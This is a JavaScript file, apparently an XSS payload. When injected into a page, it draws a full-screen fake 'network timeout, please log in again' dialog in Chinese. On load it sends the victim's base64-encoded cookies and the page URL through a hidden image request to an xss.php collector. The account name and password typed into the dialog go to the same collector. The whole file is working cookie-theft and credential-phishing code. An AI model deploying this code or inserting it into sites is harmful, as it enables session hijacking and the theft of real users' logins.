
addElementDiv();
function base64_encode(str){
			var c1, c2, c3;
			var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";               
			var i = 0, len= str.length, string = '';

			while (i < len){
					c1 = str.charCodeAt(i++) & 0xff;
					if (i == len){
							string += base64EncodeChars.charAt(c1 >> 2);
							string += base64EncodeChars.charAt((c1 & 0x3) << 4);
							string += "==";
							break;
					}
					c2 = str.charCodeAt(i++);
					if (i == len){
							string += base64EncodeChars.charAt(c1 >> 2);
							string += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
							string += base64EncodeChars.charAt((c2 & 0xF) << 2);
							string += "=";
							break;
					}
					c3 = str.charCodeAt(i++);
					string += base64EncodeChars.charAt(c1 >> 2);
					string += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
					string += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
					string += base64EncodeChars.charAt(c3 & 0x3F)
			}
					return string
	}




function addElementDiv(){

 var parent = document.getElementsByTagName("body")[0];

var div = document.createElement("div");
div.setAttribute("id", "newDiv"); 
div.innerHTML = '<div style="width:100%;height:800px;background:#fff;position:absolute;top:0.5px;z-index:999999" id="qr_dialog">'+
	'<div style="width:300px;margin:0 auto;margin-top:100px;background:#fff;height:240px;border:8px solid #aaa;">'+
		'<span style="float:left;width:93%;padding:10px;background:#eee"><font color=red size=2>网络超时，请重新登录</font></span>'+
		'<div style="float:left;width:100%;margin-top:10px;margin-left:50px;">'+
			'<span style="float:left;width:90%;margin-top:20px;">账号: <input type="text" size="20" id="qr_account"></span></span>'+
			'<span style="float:left;width:90%;margin-top:20px;">密码: <input type="password" size="20" id="qr_pwd"></span>'+
			'<span style="float:left;width:90%;margin-top:20px;">'+
			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'+
				'<a href="javascript:void(0);" onclick="send()" id="qr" style="border:1px solid #aaa;padding:5px 30px;font-size:12px;color:#000;">确认</a>'+
			'</span>'+
		'</div>'+
	'</div>'+
'</div>';

parent.appendChild(div);

		var div1 = document.createElement("div");
			div1.innerHTML ="<img style='display:none;' src='http://127.0.0.1/xss.php?c="+base64_encode(document.cookie)+"&d="+window.location.href+"'>"; 
			parent.appendChild(div1);

}

function send(){
	var parent = document.getElementsByTagName("body")[0];
	var a = document.getElementById("qr_account").value;
	var p = document.getElementById("qr_pwd").value;

	var div2 = document.createElement("div");
	div2.innerHTML ="<img style='display:none;' src='http://127.0.0.1/xss.php?a="+a+"&b="+p+"'>"; 
	parent.appendChild(div2);
	document.getElementById("qr_dialog").style.cssText="display:none;";

}